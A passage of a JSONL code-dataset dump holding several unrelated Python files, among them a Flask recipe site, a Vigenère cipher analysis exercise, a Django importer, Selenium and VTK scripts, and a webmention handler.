ID\n {\n 'category_name' : request.form.get('category_name') # Fetch updates category from input field and store in the right field in the databse\n })\n return redirect(url_for('admin'))\n\n\n# Update Cuisine (editcuisine.html) \n@app.route(\"/update_cuisine/\", methods=[\"POST\"])\ndef update_cuisine(cus_id):\n updatecuisine = recipe.db.cuisines\n updatecuisine.update({'_id': ObjectId(cus_id)}, # Update data in the database based on uniq ID\n {\n 'cuisine_name' : request.form.get('cuisine_name') # Fetch updated cuisine from input field and store in the right field in the databse\n })\n return redirect(url_for('admin'))\n\n\n# Delete Recipe (admin.html)\n@app.route('/delete_recipe/')\ndef delete_recipe(task_id):\n recipe.db.recipes.remove({'_id': ObjectId(task_id)}) # Delete perticular recipe from database based on uniq ID\n return redirect(url_for('admin'))\n \n \n# Delete Category (admin.html)\n@app.route('/delete_category/')\ndef delete_category(cat_id):\n recipe.db.categories.remove({'_id': ObjectId(cat_id)}) # Delete perticular category from database based on uniq ID\n return redirect(url_for('admin'))\n \n\n# Delete Cuisine (admin.html)\n@app.route('/delete_cuisine/')\ndef delete_cuisine(cus_id):\n recipe.db.cuisines.remove({'_id': ObjectId(cus_id)}) # Delete perticular cuisine from database based on uniq ID\n return redirect(url_for('admin'))\n\n\n# Beef Recipe View (beef.html)\n@app.route('/beef')\ndef beef():\n return render_template(\"beef.html\",\n page_title = 'Beef Recipes', \n beef_recipe = recipe.db.recipes.find().sort('recipe_name'),\n beef_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Chicken Recipe View (chicken.html)\n@app.route('/chicken')\ndef chicken():\n return render_template(\"chicken.html\",\n page_title = 'Chicken Recipes', \n chick_recipe = recipe.db.recipes.find().sort('recipe_name'),\n chick_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Healthy Recipe View (healthy.html)\n@app.route('/healthy')\ndef healthy():\n return render_template(\"healthy.html\",\n page_title = 'Healthy Recipes', \n healthy_recipe = recipe.db.recipes.find().sort('recipe_name'),\n healthy_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Lamb Recipe View (lamb.html)\n@app.route('/lamb')\ndef lamb():\n return render_template(\"lamb.html\",\n page_title = 'Lamb Recipes', \n lamb_recipe = recipe.db.recipes.find().sort('recipe_name'),\n lamb_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Pork Recipe View (pork.html)\n@app.route('/pork')\ndef pork():\n return render_template(\"pork.html\",\n page_title = 'Pork Recipes', \n pork_recipe = recipe.db.recipes.find().sort('recipe_name'),\n pork_check = recipe.db.recipes.find().sort('recipe_name')) \n\n\n\n# Sea Food Recipe View (seafood.html)\n@app.route('/seafood')\ndef seafood():\n return render_template(\"seafood.html\",\n page_title = 'Sea Food Recipes', \n seafood_recipe = recipe.db.recipes.find().sort('recipe_name'),\n seafood_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Vegan Recipe View (vegan.html)\n@app.route('/vegan')\ndef vegan():\n return render_template(\"vegan.html\",\n page_title = 'Vegan Recipes', \n vegan_recipe = recipe.db.recipes.find().sort('recipe_name'),\n vegan_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Vegetable Recipe View (veg.html)\n@app.route('/veg')\ndef veg():\n return render_template(\"veg.html\",\n page_title = 'Vegetable Recipes', \n veg_recipe = recipe.db.recipes.find().sort('recipe_name'),\n veg_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Under 30 mins Recipe View (u30.html)\n@app.route('/u30')\ndef u30():\n return render_template(\"u30.html\",\n page_title = 'Recipes Under 30 Mins to Cook', \n u30_recipe = recipe.db.recipes.find().sort('recipe_name'),\n u30_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Over 30 mins Recipe View (o30.html)\n@app.route('/o30')\ndef o30():\n return render_template(\"o30.html\",\n page_title = 'Recipes Over 30 Mins to Cook', \n o30_recipe = recipe.db.recipes.find().sort('recipe_name'),\n o30_check = recipe.db.recipes.find().sort('recipe_name')) \n\n \n# American Cuisine View (american.html)\n@app.route('/american')\ndef american():\n return render_template(\"american.html\",\n page_title = 'American Cuisines',\n amc_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n amc_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Australian Cuisine View (australian.html) \n@app.route('/australian')\ndef australian():\n return render_template(\"australian.html\",\n page_title = 'Australian Cuisines',\n aus_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n aus_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Canadian Cuisine View (canadian.html) \n@app.route('/canadian')\ndef canadian():\n return render_template(\"canadian.html\",\n page_title = 'Canadian Cuisines',\n cnd_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n cnd_check = recipe.db.recipes.find().sort('recipe_name'))\n \n \n# Chinese Cuisine View (chinese.html) \n@app.route('/chinese')\ndef chinese():\n return render_template(\"chinese.html\",\n page_title = 'Chinese Cuisines',\n cnc_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n cnc_check = recipe.db.recipes.find().sort('recipe_name'))\n \n \n# European Cuisine View (earopean.html)\n@app.route('/european')\ndef european():\n return render_template(\"european.html\",\n page_title = 'European Cuisines',\n eur_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n eur_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Far Eastern Cuisine View (fareastern.html)\n@app.route('/fareastern')\ndef fareastern():\n return render_template(\"fareastern.html\",\n page_title = 'Far Eastern Cuisines',\n fre_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n fre_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Mediterranean Cuisine View (mediterranean.html)\n@app.route('/mediterranean')\ndef mediterranean():\n return render_template(\"mediterranean.html\",\n page_title = 'Mediterranean Cuisines',\n mdt_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n mdt_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Middel Eastern Cuisine View (middleeastern.html)\n@app.route('/middleeastern')\ndef middleeastern():\n return render_template(\"middleeastern.html\",\n page_title = 'Middle Eastern Cuisines',\n mde_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n mde_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# North African Cuisine View (northafrican.html)\n@app.route('/northafrican')\ndef northafrican():\n return render_template(\"northafrican.html\",\n page_title = 'North African Cuisines',\n naf_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n naf_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# South African Cuisine View (southafrican.html)\n@app.route('/southafrican')\ndef southafrican():\n return render_template(\"southafrican.html\",\n page_title = 'South African Cuisines',\n saf_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n saf_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# South American Cuisine View (southamerican.html)\n@app.route('/southamerican')\ndef southamerican():\n return render_template(\"southamerican.html\",\n page_title = 'South American Cuisines',\n sam_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n sam_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# South Asian Cuisine View (southasian.html)\n@app.route('/southasian')\ndef southasian():\n return render_template(\"southasian.html\",\n page_title = 'South Asian Cuisines',\n sas_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n sas_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n\n@app.route(\"/recipes/\")\ndef about_recipe(recipe_name):\n recipe={}\n with open(\"data/recipes.json\", \"r\") as json_data:\n data = json.load(json_data)\n for obj in data:\n if obj[\"url\"] == recipe_name:\n recipe = obj\n return render_template(\"description.html\", recipe=recipe)\n\nif __name__ == \"__main__\":\n app.run(host=os.environ.get(\"IP\", \"0.0.0.0\"),\n port=int(os.environ.get(\"PORT\", \"5000\")),\n debug=False)","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":26337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"527901198","text":"import re, math, string, collections, pprint\n\nprint('\\n TASK 1 and 2\\n')\n\nf = open('text2.txt', 'r', encoding='utf-8').read()\nf = f.lower()\nrus_alph = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\n\nfor letter in f:\n if letter not in rus_alph:\n f = f.replace(letter, '')\n\nf = f.replace('ё', 'е').replace('\\n', '')\nf = re.sub(\" +\", \" \", f)\n\nprint('Открытый текст:\\n', f, '\\n')\n\nalpha = 'абвгдежзийклмнопрстуфхцчшщъыьэюя'\nlet_pl = {}\npl_let = {}\n\n#####індекси відповідності\namount_word = collections.Counter(f)\n\n# pprint.pprint(dict(word_count))\n\ntext_ind = 0\n\nfor i in amount_word:\n text_ind += amount_word[i] * (amount_word[i] - 1)\n\ntext_ind = text_ind / (len(f) * (len(f) - 1))\n\nprint('\\n', 'INDEX OPEN TEXT: ', text_ind, '\\n')\n\n##########################\ni = 0\nfor letter in alpha:\n let_pl[letter] = i\n pl_let[i] = letter\n i += 1\n\nprint(let_pl['а'])\n\nkeys = [\"ад\", \"лом\", \"сало\", \"плохо\", \"електростанция\"]\nj = 0\nencr_text = []\nfr_encr_text = []\nstr_encr_text = \"\"\nlength_key = len(keys)\n\nfor j in range(0, length_key):\n key = keys[j]\n len_key = len(key)\n i = 0\n for letter in f:\n open_letter = let_pl[letter]\n encrypt_letter_pos = (open_letter + let_pl[key[i]]) % 32\n encrypt_letter = pl_let[encrypt_letter_pos]\n i = (i + 1) % len(key)\n str_encr_text += str(encrypt_letter)\n\n print('Зашифрованый текст з ключем ', key, ', длины ', len_key, ':\\n', str_encr_text, '\\n')\n\n amount_encrypt = len(str_encr_text)\n word_count_encrypt = collections.Counter(str_encr_text)\n\n index_encrypt_text = 0\n\n for n in word_count_encrypt:\n index_encrypt_text += word_count_encrypt[n] * (word_count_encrypt[n] - 1)\n\n index_encrypt_text = index_encrypt_text / ((len(str_encr_text) - 1) * len(str_encr_text))\n\n print('\\n', 'INDEX ENCRYPT TEXT WITH KEY', key, ' : ', index_encrypt_text, '\\n')\n\n fr_encr_text.append(index_encrypt_text)\n encr_text.append(str_encr_text)\n str_encr_text = \"\"\n j += 1\n\n####### TASK 3\n\nprint('\\n TASK 3\\n')\n\nword_fr = {'а': '0.08267',\n 'б': '0.01787',\n 'в': '0.04306',\n 'г': '0.01597',\n 'д': '0.03169',\n 'е': '0.08788',\n 'ж': '0.01063',\n 'з': '0.01618',\n 'и': '0.06673',\n 'й': '0.01210',\n 'к': '0.03309',\n 'л': '0.04911',\n 'м': '0.03424',\n 'н': '0.06605',\n 'о': '0.10897',\n 'п': '0.02385',\n 'р': '0.04139',\n 'с': '0.05668',\n 'т': '0.06016',\n 'у': '0.02625',\n 'ф': '0.00142',\n 'х': '0.00788',\n 'ц': '0.00292',\n 'ч': '0.01534',\n 'ш': '0.00846',\n 'щ': '0.00315',\n 'ъ': '0.00021',\n 'ы': '0.01991',\n 'ь': '0.02139',\n 'э': '0.00498',\n 'ю': '0.00547',\n 'я': '0.02434'}\n\nmax_fr_let = 0\n\nfor i in word_fr:\n if max_fr_let < float(word_fr[i]):\n max_fr_let = float(word_fr[i])\n max_let = i\n\nmax_let_place = int(let_pl[max_let])\n\nth_index = 0\n\nfor n in word_fr:\n th_index += pow(float(word_fr[n]), 2)\n\nprint('\\n', 'THEORETICAL INDEX : ', th_index, '\\n')\n\nencrypt_file = open('text.txt', 'r', encoding='utf-8').read()\nencrypt_file = encrypt_file.replace('\\n', '')\n\nencrypt_amount = len(encrypt_file)\nencrypt_fr = collections.Counter(encrypt_file)\n\nprint(encrypt_file)\n\nind_y = {}\ny_mass = {}\nfor r in range(1, 33, 1):\n y = []\n\n for j in range(0, r, 1):\n\n y_letters = \"\"\n index_y = 0\n\n for i in range(j, len(encrypt_file), r):\n letter = encrypt_file[i]\n y_letters += letter\n\n y_letters_fr = collections.Counter(y_letters)\n \n\n for i in y_letters_fr:\n index_y += y_letters_fr[i] * (y_letters_fr[i] - 1)\n\n index_y = index_y / (len(y_letters) * (len(y_letters) - 1))\n\n y.append(index_y)\n\n y_mass[r] = sum(y) / len(y)\n\nprint(y_mass)\n\nclosest = 9999\nfor i in range(2, 31, 1):\n iq = math.fabs(th_index - y_mass[i])\n print(th_index,'-',y_mass[i],'=',iq)\n if iq < closest:\n closest = iq\n closest_amount = y_mass[i]\n key_r = i\n\nprint('\\nКлюч r=', key_r, '\\nЗначение:', closest_amount, 'самое близкое к теоретическому значению', th_index, '\\n')\n\ny = []\nencr_word = \"\"\nfor j in range(0, key_r, 1):\n print('\\nY', j)\n y_letters = \"\"\n index_y = 0\n\n for i in range(j, len(encrypt_file), key_r):\n letter = encrypt_file[i]\n y_letters += letter\n\n y_letters_fr = collections.Counter(y_letters)\n print('\\n',y_letters,'\\n')\n\n for i in y_letters_fr:\n fr = y_letters_fr[i] / (len(y_letters))\n fr = '%.5f' % fr\n y_letters_fr[i] = fr\n\n max_fr = 0\n max_fr_mass = []\n for i in y_letters_fr:\n if max_fr < float(y_letters_fr[i]):\n max_fr = float(y_letters_fr[i])\n max_letter = i\n\n print('Самую большую частоту имеет буква: ', max_letter, ', частота: ', max_fr, '\\n')\n\n place = int(let_pl[max_letter])\n encrypt_key = (place - 14) % 32\n\n print('Буква ключа:', pl_let[encrypt_key])\n\n encr_word += pl_let[encrypt_key]\n encrypt_key = (place) % 32\n print('Возможная буква для замены:', pl_let[encrypt_key])\n\nencr_word = \"венецианскийкупец\"\nprint('\\nKEY: ', encr_word)\n\ni = 0\ndecr_file = \"\"\nfor letter in encrypt_file:\n decr_letter_place = (int(let_pl[letter]) - int(let_pl[encr_word[i]])) % 32\n decr_letter = pl_let[decr_letter_place]\n decr_file += decr_letter\n i = (i + 1) % key_r\n\nprint('\\nDecrypt file:\\n', decr_file)\n","sub_path":"cp_2/morozov_fb-72_sinicin_fb-73_cp2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"184404388","text":"import argparse\nfrom django.core.management.base import BaseCommand\nfrom bc211.import_icarol_xml.importer import parse_csv, update_all_organizations\nfrom bc211.import_icarol_xml.import_counters import ImportCounters\nimport xml.etree.ElementTree as etree\n\n# invoke as follows:\n# python manage.py import_icarol_xml path/to/bc211.xml\n\n\nclass Command(BaseCommand):\n help = 'Import BC-211 data from XML file'\n\n def add_arguments(self, parser):\n parser.add_argument('file',\n type=argparse.FileType('r'),\n metavar='file',\n help='Path to XML file containing BC-211 data')\n parser.add_argument('--cityLatLongs',\n metavar='cityLatLongs',\n help='Path to CSV file containing city to latlong dictionary')\n\n def handle(self, *args, **options):\n file = options['file']\n if options['cityLatLongs']:\n city_latlong_map = parse_csv(options['cityLatLongs'])\n else:\n city_latlong_map = {}\n counts = ImportCounters()\n nodes = etree.iterparse(file, events=('end',))\n update_all_organizations(nodes, city_latlong_map, counts)\n self.print_status_message(counts)\n\n def print_status_message(self, counts):\n message = f'{counts.organizations_created} organizations created. '\n message += f'{counts.locations_created} locations created. '\n message += f'{counts.services_created} services created. '\n message += f'{counts.taxonomy_term_count} taxonomy terms created. '\n message += f'{counts.address_count} addresses created. '\n message += f'{counts.phone_at_location_count} phone numbers created '\n message += f'and {counts.phone_number_types_count} phone number types created. '\n\n self.stdout.write(self.style.SUCCESS(message))\n","sub_path":"bc211/management/commands/import_icarol_xml.py","file_name":"import_icarol_xml.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"482471436","text":"\"\"\"\nbrowser_navigation: Tarayıcıda gezinme işlemleri\n\"\"\"\nfrom selenium import webdriver\nimport settings\nimport time\n\n# tarayıcı nesnesi oluşturalım\ndriver = webdriver.Chrome(settings.driver_path)\n\n# adrese git\ndriver.get(\"https://istanbulakademi.meb.gov.tr\")\n\n# bulunduğum adresi yazdıralım\nprint(driver.current_url)\n\ntime.sleep(2)\n\n# yeni adrese git\ndriver.get(\"https://istanbulakademi.meb.gov.tr/akademiler.php?pID=615\")\nprint(driver.current_url)\n\ntime.sleep(2)\n\n# bir önceki sayfaya dön\ndriver.back()\nprint(driver.current_url)\n\ntime.sleep(2)\n\n# bir sonraki sayfa dön\ndriver.forward()\nprint(driver.current_url)\n\ntime.sleep(2)\n\n# sayfa başlığını yazdıralım\nprint(driver.title)\n\ntime.sleep(2)\n\n# tarayıcıyı kapat\ndriver.close()\n","sub_path":"teachers/mfatiharslan/browser_navigation.py","file_name":"browser_navigation.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"308692857","text":"from __future__ import absolute_import\nimport os\n\nfrom .helper import SolveBioTestCase\nfrom solvebio.utils.files import check_gzip_path\n\n\nclass GzipTest(SolveBioTestCase):\n\n def test_gzip_file(self):\n path = os.path.join(os.path.dirname(__file__), \"data\")\n for yes_gzip in ['some_export.json.gz',\n 'sample.vcf.gz']:\n path = os.path.join(path, yes_gzip)\n self.assertTrue(check_gzip_path(path), path)\n\n for non_gzip in ['sample2.vcf',\n 'test_export.json',\n 'test_export.csv',\n 'test_export.xlsx']:\n path = os.path.join(path, non_gzip)\n self.assertFalse(check_gzip_path(path), path)\n","sub_path":"solvebio/test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"108412412","text":"import vtk\n\n\ndef read_polydata(vtp_filename, use_vmtk=False):\n if use_vmtk:\n from vmtk import pypes\n arg = 'vmtksurfaceviewer -ifile {}'.format(vtp_filename)\n pype_obj = pypes.PypeRun(arg)\n script_obj = pype_obj.GetScriptObject(\"vmtksurfaceviewer\", '0')\n poly_obj = script_obj.Surface\n return poly_obj\n\n else:\n # TODO(sglee) : 이 부분 구현할 것. 현재 코드로 안 됨\n reader = vtk.vtkXMLPolyDataReader()\n reader.SetFileName(vtp_filename)\n reader.Update()\n poly_obj = reader.GetOutput()\n return poly_obj\n\n\ndef write_stl_and_obj(poly_obj, output_file_prefix):\n \"\"\"\n 3D 형상을 입력하여 stl 파일과 obj 파일을 만든다.\n :param poly_obj: 출력할 3D 형상 (vtkPolyData 타입)\n :param output_file_prefix: 출력할 파일 이름 (단, 확장자는 붙이면 안 된다)\n \"\"\"\n stl_filename = output_file_prefix + '.stl'\n obj_fileprefix = output_file_prefix\n\n # STL Write\n stlWriter = vtk.vtkSTLWriter()\n stlWriter.SetFileName(stl_filename)\n stlWriter.SetInputDataObject(poly_obj)\n stlWriter.Write()\n\n # Draw Before OBJ Write\n # Now we'll look at it.\n mapper = vtk.vtkPolyDataMapper()\n if vtk.VTK_MAJOR_VERSION <= 5:\n mapper.SetInput(poly_obj)\n else:\n mapper.SetInputData(poly_obj)\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n\n # Create a rendering window and renderer\n ren = vtk.vtkRenderer()\n renWin = vtk.vtkRenderWindow()\n renWin.AddRenderer(ren)\n\n # Create a renderwindowinteractor\n iren = vtk.vtkRenderWindowInteractor()\n iren.SetRenderWindow(renWin)\n\n # Assign actor to the renderer\n ren.AddActor(actor)\n\n # Enable user interface interactor\n iren.Initialize()\n renWin.Render()\n # iren.Start() # 이걸 주석 해제하면 보여주는 창이 뜬다\n\n # OBJ Write\n objExporter = vtk.vtkOBJExporter()\n objExporter.SetFilePrefix(obj_fileprefix)\n objExporter.SetRenderWindow(renWin)\n objExporter.Write()\n\n\ndef write_obj(poly_obj, output_file_prefix):\n \"\"\"\n 3D 형상을 입력하여 obj 파일을 만든다.\n :param poly_obj: 출력할 3D 형상 (vtkPolyData 타입)\n :param output_file_prefix: 출력할 파일 이름 (단, 확장자는 붙이면 안 된다)\n \"\"\"\n obj_file_prefix = output_file_prefix\n\n # Draw Before OBJ Write\n # Now we'll look at it.\n mapper = vtk.vtkPolyDataMapper()\n if vtk.VTK_MAJOR_VERSION <= 5:\n mapper.SetInput(poly_obj)\n else:\n # NOTE: 임시 시험용으로 SetInputConnection으로 대체\n mapper.SetInputData(poly_obj)\n # mapper.SetInputConnection(poly_obj.GetOutputPort())\n actor = vtk.vtkActor()\n actor.GetProperty().SetRepresentationToWireframe()\n actor.SetMapper(mapper)\n\n # Create a rendering window and renderer\n ren = vtk.vtkRenderer()\n renWin = vtk.vtkRenderWindow()\n renWin.AddRenderer(ren)\n\n # Create a renderwindowinteractor\n iren = vtk.vtkRenderWindowInteractor()\n iren.SetRenderWindow(renWin)\n\n # Assign actor to the renderer\n ren.AddActor(actor)\n\n # Enable user interface interactor\n iren.Initialize()\n renWin.Render()\n iren.Start() # 이걸 주석 해제하면 보여주는 창이 뜬다\n\n # OBJ Write\n objExporter = vtk.vtkOBJExporter()\n objExporter.SetFilePrefix(obj_file_prefix)\n objExporter.SetRenderWindow(renWin)\n objExporter.Write()","sub_path":"src/topic_tutorial/scripts/lib/common/file_io.py","file_name":"file_io.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"84053034","text":"\"\"\"\nQuestion: https://www.codechef.com/problems/LECANDY\n\nVariables:\nt : testcases, holding the number of testcases\nn : number of elephants in the zoo\nc : number of candies in the zoo\na : array containing the number of candies required\n to make each elephant happy, in order\n\"\"\"\n\nimport sys\n\nif __name__ == \"__main__\":\n t = list(map(int, input().split()))[0]\n\n for i in range(0, t):\n n, c = list(map(int, input().split()))\n a = list(map(int, input().split()))\n\n # if elephants > candies\n if n > c:\n print('No')\n continue\n\n # if not then we proceed\n if sum(a) > c:\n print('No')\n else:\n print('Yes')\n continue\n","sub_path":"arrays/lecandy.py","file_name":"lecandy.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"610029973","text":"\"\"\"Joins all walls.\"\"\"\n\n__title__ = 'Join\\nWalls'\n\n\n\nimport clr\nclr.AddReference('RevitAPI')\nfrom Autodesk.Revit.DB import *\nfrom System.Collections.Generic import *\nclr.AddReference(\"RevitServices\")\nimport RevitServices\nfrom RevitServices.Persistence import DocumentManager\nfrom RevitServices.Transactions import TransactionManager\nimport itertools\ndoc = __revit__.ActiveUIDocument.Document\n\nwalls= FilteredElementCollector(doc).OfCategory(BuiltInCategory.OST_Walls).WhereElementIsNotElementType().ToElements()\nopt = Options()\n\nGeom=[i.get_Geometry(opt) for i in walls]\nSolids = list(itertools.chain(*Geom))\ntx = Transaction(doc, 'join walls')\ntx.Start()\nfor i in range (len(walls)):\n for j in range (i,len(walls)):\n surface1 = Solids[i].Faces[0].GetSurface()\n surface2 = Solids[i].Faces[1].GetSurface()\n surface3 = Solids[j].Faces[0].GetSurface()\n surface4 = Solids[j].Faces[1].GetSurface()\n if not (JoinGeometryUtils.AreElementsJoined(doc, walls[i], walls[j])) and (BooleanOperationsUtils.ExecuteBooleanOperation(Solids[i], Solids[j], BooleanOperationsType.Intersect).Volume)*0.0283168 > 0.0 and i!=j:\n JoinGeometryUtils.JoinGeometry(doc, walls[i], walls[j])\n elif surface1.Project(surface4.Origin)[1] < 0.00001 or surface2.Project(surface3.Origin)[1] <0.00001:\n JoinGeometryUtils.JoinGeometry(doc, walls[i], walls[j])\n \ntx.Commit()","sub_path":"join_script.py","file_name":"join_script.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"496665910","text":"\"\"\"\nGiven a data stream input of non-negative integers a1, a2, ..., an, ..., summarize the numbers seen so far as a list of disjoint intervals.\n\nFor example, suppose the integers from the data stream are 1, 3, 7, 2, 6, ..., then the summary will be:\n\n[1, 1]\n[1, 1], [3, 3]\n[1, 1], [3, 3], [7, 7]\n[1, 3], [7, 7]\n[1, 3], [6, 7]\nFollow up:\nWhat if there are lots of merges and the number of disjoint intervals are small compared to the data stream's size?\n\n\n\"\"\"\nimport heapq\nclass Interval(object):\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\nclass SummaryRanges(object):\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.min_heap = []\n\n def addNum(self, val):\n \"\"\"\n :type val: int\n :rtype: void\n \"\"\"\n heapq.heappush(self.min_heap, (val, Interval(val, val)))\n\n # O(nlgn)\n def getIntervals(self):\n \"\"\"\n :rtype: List[Interval]\n \"\"\"\n self.stack = []\n while self.min_heap:\n val, interval = heapq.heappop(self.min_heap)\n if not self.stack:\n self.stack.append((val, interval))\n else:\n _, last_interval = self.stack[-1]\n if interval.start <= last_interval.end + 1:\n last_interval.end = max(last_interval.end, interval.end)\n else:\n self.stack.append((val, interval))\n self.min_heap = self.stack\n return list(map(lambda x: x[1], self.stack))\n","sub_path":"leetcode/352_data_stream_as_disjoint_intervals.py","file_name":"352_data_stream_as_disjoint_intervals.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"527225135","text":"# -*- coding: utf-8 -*-\n\"\"\"\n:copyright: (c) 2016 by Mike Taylor\n:license: CC0 1.0 Universal, see LICENSE for more details.\n\"\"\"\n\nimport os\nimport json\nimport datetime\n\nimport pytz\nimport ninka\nimport ronkyuu\n\nfrom flask import current_app\nfrom mf2py.parser import Parser\n\nfrom kaku.tools import kakuEvent, extractHCard\n\n\ndef processVouch(sourceURL, targetURL, vouchDomain):\n \"\"\"Determine if the vouch domain is valid.\n\n This implements a very simple method for determining if a vouch should\n be considered valid:\n 1. does the vouch domain have it's own webmention endpoint\n 2. does the vouch domain have an indieauth endpoint\n 3. does the domain exist in the list of domains i've linked to\n \"\"\"\n result = False\n vouchDomains = []\n vouchFile = os.path.join(current_app.config['SITE_CONTENT'], 'vouch_domains.txt')\n if os.isfile(vouchFile):\n with open(vouchFile, 'r') as h:\n for domain in h.readlines():\n vouchDomains.append(domain.strip().lower())\n\n # result = ronkyuu.vouch(sourceURL, targetURL, vouchDomain, vouchDomains)\n\n if vouchDomain.lower() in vouchDomains:\n result = True\n else:\n wmStatus, wmUrl = ronkyuu.discoverEndpoint(vouchDomain, test_urls=False)\n if wmUrl is not None and wmStatus == 200:\n authEndpoints = ninka.indieauth.discoverAuthEndpoints(vouchDomain)\n\n if 'authorization_endpoint' in authEndpoints:\n authURL = None\n for url in authEndpoints['authorization_endpoint']:\n authURL = url\n break\n if authURL is not None:\n result = True\n with open(vouchFile, 'a+') as h:\n h.write('\\n%s' % vouchDomain)\n return result\n\ndef mention(sourceURL, targetURL, vouchDomain=None):\n \"\"\"Process the incoming Webmention from the sourceURL.\n\n To verify that the targetURL being referenced by the sourceURL\n is a valid reference we run findMentions() at it and scan the\n resulting href list.\n\n This does the following checks:\n 1. The sourceURL exists\n 2. The sourceURL indeed does reference our targetURL\n 3. The sourceURL is a valid Vouch (if configured to check)\n 4. The sourceURL is active and not deleted, if deleted then remove\n it from our list of mentions for targetURL\n \"\"\"\n current_app.logger.info('handling Webmention from %s' % sourceURL)\n\n try:\n result = False\n vouched = False\n mentions = ronkyuu.findMentions(sourceURL)\n current_app.logger.info('mentions %s' % mentions)\n\n if mentions['status'] == 410:\n data = { 'targetURL': targetURL,\n 'sourceURL': sourceURL\n }\n current_app.logger.info('mention removal event from [%s] of [%s]' % (targetURL, sourceURL))\n kakuEvent('mention', 'deleted', data)\n else:\n for href in mentions['refs']:\n if href != sourceURL and href == targetURL:\n current_app.logger.info('post at %s was referenced by %s' % (targetURL, sourceURL))\n if current_app.config['VOUCH_REQUIRED']:\n if vouchDomain is None:\n vouched = False\n result = False\n else:\n vouched = processVouch(sourceURL, targetURL, vouchDomain)\n result = vouched\n else:\n vouched = False\n result = True\n\n if result:\n utcdate = datetime.datetime.utcnow()\n tzLocal = pytz.timezone('America/New_York')\n timestamp = tzLocal.localize(utcdate, is_dst=None)\n mf2Data = Parser(doc=mentions['content']).to_dict()\n hcard = extractHCard(mf2Data)\n data = { 'sourceURL': sourceURL,\n 'targetURL': targetURL,\n 'vouchDomain': vouchDomain,\n 'vouched': vouched,\n 'postDate': timestamp.strftime('%Y-%m-%dT%H:%M:%S'),\n 'hcard': hcard,\n 'mf2data': mf2Data,\n }\n current_app.logger.info('mention created for [%s] from [%s]' % (targetURL, sourceURL))\n current_app.logger.info(json.dumps(data, indent=2))\n kakuEvent('mention', 'create', data)\n\n current_app.logger.info('mention() returning %s' % result)\n except ValueError:\n current_app.logger.exception('Exception raised during webmention processing')\n result = False\n return result, vouched\n","sub_path":"kaku/mentions.py","file_name":"mentions.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"252296177","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom cms.models import CMSPlugin\n\n\nclass GistPluginModel(CMSPlugin):\n\n gist_user = models.CharField('GitHub user',\n blank=False,\n default='',\n help_text=_('Choose the GitHub user for this Gist.'),\n max_length=32,\n )\n\n gist_id = models.CharField('Gist ID',\n blank=False,\n default='',\n help_text=_('Enter the Gist ID.'),\n max_length=32,\n )\n\n filename = models.CharField('filename',\n blank=False,\n default='',\n help_text=_('Optional. Enter the filename, if there are multiple files.'),\n max_length=32,\n )\n","sub_path":"djangocms_gist/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"200278432","text":"import toml\nfrom io import TextIOBase\nfrom enum import Enum\nfrom numbers import Real\nfrom typing import Union, Sequence, Dict, Any\nimport numpy as np\nfrom 